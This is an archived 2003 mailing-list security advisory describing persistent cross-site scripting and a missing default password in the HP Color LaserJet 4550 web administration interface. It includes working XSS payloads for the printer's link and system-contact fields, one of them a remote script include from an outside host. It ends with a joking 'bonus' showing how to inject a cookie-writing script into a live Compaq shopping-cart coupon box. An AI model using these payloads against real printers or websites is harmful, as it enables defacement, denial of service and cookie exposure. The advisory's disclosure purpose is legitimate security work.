HP 4550 Printer - Remote XSS DoS -

From: morning_wood (se_cur_ityat_private)
Date: Thu Jul 24 2003 - 02:07:58 PDT

Next message: Conectiva Updates: "[CLA-2003:704] Conectiva Security Announcement - apache"

Previous message: Thor Larholm: "RE: Drivial Pursuit: Internet Explorer Browser & Your Files and Folders !"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------------------------------------------------------------------
          - EXPL-A-2003-018 exploitlabs.com Advisory 018
------------------------------------------------------------------
                  -= HP Color LaserJet 4550 =-



Donnie Werner
July 22, 2003
http://exploitlabs.com



Product:
--------
Hewlet Packard Color LaserJet 4550 ( possibly others )


Vunerability(s):
----------------
1. Remote Persistant Xss DoS
2. no default password


Description of product:
-----------------------
"Designed for business professionals who want
 to communicate more effectively using high-quality,
  professional - looking color documents"



VUNERABILITY / EXPLOIT
======================

1. Remote Persistant Xss DoS
-------------------------------

The remote administration interface of the
HP Color LaserJet 4550 uses extensive javascript in
building dynamic content for administration of the
printers setup and manegment.

uhh oh..


Detail: by introducing XSS we render the remote interface useless...

Example 1.

Add Link:
 The HP allows an inclusion of a user definable link...

http://[printer-ip]/hp/device/this.LCDispatcher?update=html&cat=0&pos=0&submit=go
http://[printer-ip]/hp/device/this.LCDispatcher

-------
Device:
 LINKS:

use: <script>alert("You are vunerable to xss - discovered by morning_wood
http://exploitlabs.com")</script>


when re-renderd we get weird out put depending on the JS used..
some examples..

http://

" id="lnkOtherLink0" target="_blank">

http://[printer-ip]/hp/device/htt</font></a><br></p></div><div%20id=

as you can see the left hand menu has completly been rendered useless...
( sorry )

looking at the source...

--------- snip -------------
}
document.writeln('<div id="navcap"><img border="0"
src="images/button_bottom.gif" width="140" height="21"><BR>');
string = 'Other Links';
document.writeln('<p><b>' + string + '</b><br>');
tmpString = '<a target="_blank"
href="this.LCLinkedPageImpl?LCLinkedPage=html&page=my_printer"
id="lnkHardLink0"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">My Printer</font></a><br><a target="_blank"
href="this.LCDispatcher?dispatch=html&page=order_supplies"
id="lnkHardLink1"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Order Supplies</font></a><br><a target="_blank"
href="http://productfinder.support.hp.com/servlet/FindIt?q=[C7085A]&t=hp&s=
x" id="lnkHardLink2"><font face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2">Solve A Problem</font></a><br>';
document.writeln(tmpString);
tmpString = '<a href="http://>alert("You are vunerable to xss -
discover" id="lnkOtherLink0" target="_blank"><font
face="Helvetica,Arial,Gill Sans,Sans Serif"
size="2"><script>alert("Y</font></a><br>';
document.writeln(tmpString + '</p>');
document.writeln('</div>');
mapheight = navcaptop - topofbuttons;
document.writeln('<div id="navmap"><img border="0" src="images/spacer.gif"
width="140" height="'+mapheight+'" usemap="#buttonsmap"></div>');
document.writeln('<MAP NAME="buttonsmap">');
for (var i=0; i < buttonarray.length; i++) {
document.writeln('<AREA SHAPE="rect"
COORDS="'+buttonarray[i]['mapcoords']+'",
HREF="'+buttonarray[i]['href']+'">');
}document.writeln('</MAP>');</script>
------- snip -------------

ouch!!


Example 2.

DIAGNOSTICS
 Network Statistics
 > Protocol Info
 Test Page

system contact and system location boxes both vuln to..

<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>

which allows remote inclusion that is persistant

this  writes to the rom and is viewable even over snmp


I am assuming the only way to fix these issues
 are to upgrade the rom or reset via a CLI interface


2. no password
-----------------------
if this was set this couldnt happen I guess.. ( oops again )



Local:
------
yes

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day ( aww.. shucks )


Vendor Contact:
---------------
Concurrent with this advisory
supportat_private
securityat_private


Credits:
--------
Donnie Werner
morning_woodat_private
http://exploitlabs.com

Original Advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-018-hp4550.txt


===================================
BONUS !!! EXTRA FUN WiTH HP / COMPAQ:
===================================

http://www.smb.compaq.com/dcart/cart.asp?

choose any product area
go to shoping cart
pick a product / quan
go to checkout

locate the "e-coupon" box
enter <script>document.write(document.cookie)</script>
press "Submit"
laugh "real hard"

Next message: Conectiva Updates: "[CLA-2003:704] Conectiva Security Announcement - apache"
Previous message: Thor Larholm: "RE: Drivial Pursuit: Internet Explorer Browser & Your Files and Folders !"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 24 2003 - 11:40:44 PDT